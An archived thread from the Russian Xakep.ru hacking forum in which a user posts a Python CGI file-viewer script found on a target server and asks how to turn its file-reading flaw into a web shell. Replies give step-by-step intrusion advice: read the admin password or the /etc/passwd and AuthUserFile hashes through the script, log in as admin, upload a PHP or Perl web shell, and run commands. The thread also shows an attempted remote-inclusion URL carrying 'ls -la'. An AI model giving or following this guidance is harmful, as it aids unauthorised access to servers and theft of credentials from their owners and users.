Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

вопросик по взлому

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Журнал Xakep] >> вопросик по взлому
Имя
Сообщение << Старые топики   Новые топики >>
вопросик по взлому - 2006-02-27 19:24:23   
Gift

Сообщений: 3
Оценки: 0
Присоединился: 2006-02-27 19:16:13
есть скриптик который может читать файлы

#!/usr/bin/python
#################################################################
# Display any cgi (or other) server-side file without running it.
# The file name can be passed in a URL param or form field; e.g.,
# http://server/~lutz/Basics/getfile.cgi?filename=somefile.cgi.
# Users can cut-and-paste or "View source" to save file locally.
# On IE, running the text/plain version (formatted=0) sometimes
# pops up Notepad, but end-of-lines are not always in DOS format;
# Netscape shows the text correctly in the browser page instead.
# Sending the file in text/html mode works on both browsers–text
# is displayed in the browser response page correctly. We also
# check the filename here to try to avoid showing private files;
# this may or may not prevent access to such files in general.
#################################################################

import cgi, os, sys
formatted = 1 # 1=wrap text in html
privates = [''../PyMailCgi/secret.py''] # don''t show these

html = """
<html><title>Getfile response</title>
<h1>Source code for: ''%s''</h1>
<hr>
<pre>%s</pre>
<hr></html>"""

def restricted(filename):
for path in privates:
if os.path.samefile(path, filename): # unify all paths by os.stat
return 1 # else returns None=false

try:
form = cgi.FieldStorage()
filename = form[''filename''].value # url param or form field
except:
filename = ''getfile.cgi'' # else default filename

try:
assert not restricted(filename) # load unless private
filetext = open(filename).read()
except Assertiопеггог:
filetext = ''(File access denied)''
except:
filetext = ''(Error opening file: %s)'' % sys.exc_value

if not formatted:
print "Content-type: text/plain\n" # send plain text
print filetext # works on NS, not IE
else:
print "Content-type: text/html\n" # wrap up in html
print html % (filename, cgi.escape(filetext))

а как получить веб-шелл ума не приложу. Подскажите плиз
Post #: 1
вопросик по взлому - 2006-02-27 20:41:08   
Сhaos_Сode

Сообщений: 1049
Оценки: 0
Присоединился: 2006-01-12 11:54:12
Веб-шелл - наскоко известно мне - возмножность выполнать команды системы - например dir uname -a ls -la через веб-интерфейс

Вот превосходный, если не лучший шелл на пхп
А вот альтернатива на perl, если пхпшный не пашет(злостный админ запретил нужные для работы шелла функции в php.ini =)) )

Осталось придумать как его залить ))) Но это уже савсем другой вопрос, на который нельзя дать однозначный ответ, ибо найти способ залить шелл на сайт имхо процесс творческий
Post #: 2
вопросик по взлому - 2006-02-28 00:26:35   
Wasp_@nti_cheater

Сообщений: 247
Оценки: 0
Присоединился: 2004-12-02 01:07:59
Можно попробовать прочитать со своего хоста и перенаправить в файл…
Post #: 3
вопросик по взлому - 2006-02-28 15:01:16   
Gift

Сообщений: 3
Оценки: 0
Присоединился: 2006-02-27 19:16:13
А как это сделать?
Можно об этом поподробнее и со скриптами, если можно.

Я ведь говорю скрипт только читать может!!!!

пробовал такую структуру и нифига
http://www.fdssfer.net/sder.cgi?t=http://mysite.ru/cmd.cgi?ls -la

и нифига!
Post #: 4
вопросик по взлому - 2006-02-28 16:58:40   
NeitR1N0

Сообщений: 8
Оценки: 0
Присоединился: 2006-02-26 12:45:42
Веб шел получить очень просто. Следуй следующим действиям.
1.С помощью этого скрипта тебе нужно вытянуть пароль админа форума(описывать не буду сам наверное знаешь как)
2. Далее меняешь заходишь на форум под админом(будь осторожен т.к. админ может тебя пропалить)
3. Пароль от админа форума может подходить и к другим вещам, которые находятся на сайте. Например ты можежь заполучить весь сайт. Потом заливаешь шел, можешь аозпользоваться предложением #chaos_coder# [from Hell].
4. Далее можешь в легкую выполнять команды.
[sm=bomb.gif]

Post #: 5
вопросик по взлому - 2006-02-28 19:27:28   
Gift

Сообщений: 3
Оценки: 0
Присоединился: 2006-02-27 19:16:13
это не форум!
Post #: 6
вопросик по взлому - 2006-03-01 09:47:35   
NeitR1N0

Сообщений: 8
Оценки: 0
Присоединился: 2006-02-26 12:45:42
Тогда еще легче читаешь etc/passwd/ потом цепляешь AuthUserFile выцепляешь хэши, и… Потом заливаешь вебшел.


Есть вопросы? Ася - 928777[sm=15.gif]
Post #: 7
Страниц:  [1]
Все форумы >> [Журнал Xakep] >> вопросик по взлому







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.